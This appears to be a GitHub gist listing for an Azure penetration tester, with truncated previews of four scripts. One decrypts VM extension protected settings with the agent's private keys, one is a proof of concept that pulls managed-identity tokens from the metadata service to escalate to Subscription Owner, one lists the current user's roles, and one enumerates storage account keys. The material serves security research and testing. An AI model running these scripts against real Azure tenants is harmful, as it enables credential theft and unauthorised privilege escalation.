kfosaaen
/ ProtectedSettingsDump.sh
Created
March 13, 2024 19:25
Dump Azure Linux VM Extension Protected Settings
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Find all ".settings" files in "/var/lib/waagent/" subdirectories | |
| find /var/lib/waagent/ -type f -name "*.settings" -print0 | while IFS= read -r -d $'\0' file; do | |
| thumbprint=$(jq -r '.runtimeSettings[].handlerSettings.protectedSettingsCertThumbprint' $file) | |
| protectedSettingsDecrypted=$(jq -r '.runtimeSettings[].handlerSettings.protectedSettings' $file | base64 --decode | openssl smime -inform DER -decrypt -recip /var/lib/waagent/$thumbprint.crt -inkey /var/lib/waagent/$thumbprint.prv | jq .) | |
| echo "File: $file" | |
| echo "Public Settings: $publicSettings" | |
| echo "Decrypted Protected Settings: $protectedSettingsDecrypted" |
kfosaaen
/ MI-Owner-Escalation.ps1
Created
February 14, 2020 21:50
A simple PoC for using an Azure Managed Identity to add a user as a Subscription Owner
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #---------Query MetaData for SubscriptionID---------# | |
| $response2 = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing | |
| $subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId | |
| #---------Get OAuth Token---------# | |
| $response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing | |
| $content = $response.Content | ConvertFrom-Json | |
| $ArmToken = $content.access_token |
kfosaaen
/ AppRegRoleFinder.ps1
Created
March 8, 2023 22:57
PowerShell 3-liner to find roles attached to your current user
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get a token and split out the payload | |
| $token = ((Get-AzAccessToken).Token).Split(".")[1].Replace('-', '+').Replace('_', '/') | |
| # Add padding, if needed | |
| while ($token.Length % 4) {$token += "="} | |
| # Base64 Decode, convert from json, extract OID, pass into filter for Get-AzRoleAssignment to find current roles | |
| Get-AzRoleAssignment | where ObjectId -EQ ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($token)) | ConvertFrom-Json).oid |
kfosaaen
/ get-MIStorageKeys.ps1
Last active
November 1, 2022 02:48
A PowerShell function to call Azure rest APIs using a VM Managed Identity to list available Storage Account access keys
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function get-MIStorageKeys{ | |
| # Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020 | |
| # Description: PowerShell function for enumerating available storage account keys from a VM Managed Identity. | |
| # Pipe to "Export-Csv -NoTypeInformation" for easier exporting | |
| # Use the subID and ArmToken parameters to specify bearer tokens and subscriptions, handy for compromised bearer tokens from other services (CloudShell/AutomationAccounts) | |
| [CmdletBinding()] | |
| Param( | |
| [Parameter(Mandatory=$false, |